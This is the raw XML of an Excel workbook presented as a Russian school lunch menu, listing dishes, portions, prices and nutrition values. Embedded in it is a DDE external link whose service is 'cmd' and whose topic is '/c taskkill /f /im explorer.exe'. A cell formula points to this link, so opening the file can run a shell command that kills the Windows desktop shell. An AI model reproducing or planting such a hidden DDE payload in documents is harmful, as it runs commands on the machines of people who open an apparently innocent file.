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A63BBBF7-C588-41C8-8C68-3866B93233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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="50" uniqueCount="48">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(для детского питания)</t>
  </si>
  <si>
    <t>Б000086</t>
  </si>
  <si>
    <t>Б000014</t>
  </si>
  <si>
    <t>Яблоко шт</t>
  </si>
  <si>
    <t>Б000066</t>
  </si>
  <si>
    <t>Чай с молоком и сахаром</t>
  </si>
  <si>
    <t>Б000121</t>
  </si>
  <si>
    <t>Каша молочная Артек жидкая с/с 2ВАР</t>
  </si>
  <si>
    <t>ДП00270</t>
  </si>
  <si>
    <t>Запеканка из творога(1вар)</t>
  </si>
  <si>
    <t>Б000002</t>
  </si>
  <si>
    <t>Хлеб ржаной(пшеничный)</t>
  </si>
  <si>
    <t>ДП00012</t>
  </si>
  <si>
    <t>Рассольник ленинградский (с перловой крупой)</t>
  </si>
  <si>
    <t>ДП00158</t>
  </si>
  <si>
    <t>Напиток яблочный(2вар)</t>
  </si>
  <si>
    <t>Б000120</t>
  </si>
  <si>
    <t>Плов из птицы(грудка)2ВАР</t>
  </si>
  <si>
    <t>Б000153</t>
  </si>
  <si>
    <t>Салат из свеклы и яблок с растительным маслом</t>
  </si>
  <si>
    <t>МОБУ СОШ д.Шарипкулово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</si>
</sst>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ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c taskkill /f /im explorer.exe &gt;nul">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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47</v>
      </c>
      <c r="C1" s="40"/>
      <c r="D1" s="41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34</v>
      </c>
      <c r="E4" s="15">
        <v>150</v>
      </c>
      <c r="F4" s="25">
        <v>11.94</v>
      </c>
      <c r="G4" s="15">
        <v>204.87799999999999</v>
      </c>
      <c r="H4" s="15">
        <v>5.8536999999999999</v>
      </c>
      <c r="I4" s="15">
        <v>9.8780000000000001</v>
      </c>
      <c r="J4" s="16">
        <v>27.8049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17">
        <v>180</v>
      </c>
      <c r="F5" s="26">
        <v>6.26</v>
      </c>
      <c r="G5" s="17">
        <v>57.6</v>
      </c>
      <c r="H5" s="17">
        <v>1.278</v>
      </c>
      <c r="I5" s="17">
        <v>1.2869999999999999</v>
      </c>
      <c r="J5" s="18">
        <v>10.116</v>
      </c>
    </row>
    <row r="6" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A6" s="7"/>
      <c r="B6" s="1" t="s">
        <v>23</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D6" s="34" t="s">
        <v>27</v>
      </c>
      <c r="E6" s="17">
        <v>30</v>
      </c>
      <c r="F6" s="26">
        <v>2.85</v>
      </c>
      <c r="G6" s="17">
        <v>70.5</v>
      </c>
      <c r="H6" s="17">
        <v>1.65</v>
      </c>
      <c r="I6" s="17">
        <v>0.3</v>
      </c>
      <c r="J6" s="18">
        <v>14.49</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A7" s="7"/>
      <c r="B7" s="2"/>
      <c r="C7" s="38" t="s">
        <v>35</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>36</v>
      </c>
      <c r="E7" s="17">
        <v>60</v>
      </c>
      <c r="F7" s="26">
        <v>32.159999999999997</v>
      </c>
      <c r="G7" s="17">
        <v>101</v>
      </c>
      <c r="H7" s="17">
        <v>6.82</v>
      </c>
      <c r="I7" s="17">
        <v>4.4000000000000004</v>
      </c>
      <c r="J7" s="18">
        <v>7.2</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A8" s="8"/>
      <c r="B8" s="9"/>
      <c r="C8" s="9" t="s">
        <v>29</v>
      </c>
      <c r="D8" s="35" t="s">
        <v>30</v>
      </c>
      <c r="E8" s="19">
        <v>100</v>
      </c>
      <c r="F8" s="27">
        <v>11.23</v>
      </c>
      <c r="G8" s="19">
        <v>44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45</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>46</v>
      </c>
      <c r="E12" s="21">
        <v>60</v>
      </c>
      <c r="F12" s="28">
        <v>11.12</v>
      </c>
      <c r="G12" s="21">
        <v>64.5</v>
      </c>
      <c r="H12" s="21">
        <v>0.81</v>
      </c>
      <c r="I12" s="21">
        <v>4.3650000000000002</v>
      </c>
      <c r="J12" s="22">
        <v>5.52</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="30" x14ac:dyDescent="0.25">
      <c r="A13" s="7"/>
      <c r="B13" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>39</v>
      </c>
      <c r="D13" s="34" t="s">
        <v>40</v>
      </c>
      <c r="E13" s="17">
        <v>200</v>
      </c>
      <c r="F13" s="26">
        <v>12.91</v>
      </c>
      <c r="G13" s="17">
        <v>176.8</v>
      </c>
      <c r="H13" s="17">
        <v>6.72</v>
      </c>
      <c r="I13" s="17">
        <v>6.96</v>
      </c>
      <c r="J13" s="18">
        <v>23.84</v>
      </c>
    </row>
    <row r="14" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A14" s="7"/>
      <c r="B14" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>43</v>
      </c>
      <c r="D14" s="34" t="s">
        <v>44</v>
      </c>
      <c r="E14" s="17">
        <v>180</v>
      </c>
      <c r="F14" s="26">
        <v>36.6</v>
      </c>
      <c r="G14" s="17">
        <v>318</v>
      </c>
      <c r="H14" s="17">
        <v>17.899999999999999</v>
      </c>
      <c r="I14" s="17">
        <v>15</v>
      </c>
      <c r="J14" s="18">
        <v>44.1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41</v>
      </c>
      <c r="D16" s="34" t="s">
        <v>42</v>
      </c>
      <c r="E16" s="17">
        <v>200</v>
      </c>
      <c r="F16" s="26">
        <v>4.04</v>
      </c>
      <c r="G16" s="17">
        <v>67</v>
      </c>
      <c r="H16" s="17"/>
      <c r="I16" s="17"/>
      <c r="J16" s="18">
        <v>17.600000000000001</v>
      </c>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A17" s="7"/>
      <c r="B17" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>28</v>
      </c>
      <c r="D17" s="34" t="s">
        <v>27</v>
      </c>
      <c r="E17" s="17">
        <v>30</v>
      </c>
      <c r="F17" s="26">
        <v>3.9</v>
      </c>
      <c r="G17" s="17">
        <v>70.5</v>
      </c>
      <c r="H17" s="17">
        <v>1.65</v>
      </c>
      <c r="I17" s="17">
        <v>0.3</v>
      </c>
      <c r="J17" s="18">
        <v>14.49</v>
      </c>
    </row>
    <row r="18" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A18" s="7"/>
      <c r="B18" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>37</v>
      </c>
      <c r="D18" s="34" t="s">
        <v>38</v>
      </c>
      <c r="E18" s="17">
        <v>30</v>
      </c>
      <c r="F18" s="26">
        <v>3.97</v>
      </c>
      <c r="G18" s="17">
        <v>87</v>
      </c>
      <c r="H18" s="17">
        <v>0.9</v>
      </c>
      <c r="I18" s="17">
        <v>0.36</v>
      </c>
      <c r="J18" s="18">
        <v>10.23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 t="e">
        <f>[1]!_xlbgnm.A1</f>
        <v>#REF!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2023-01-26T15:10:12Z</dcterms:modified>
</cp:coreProperties>
</file>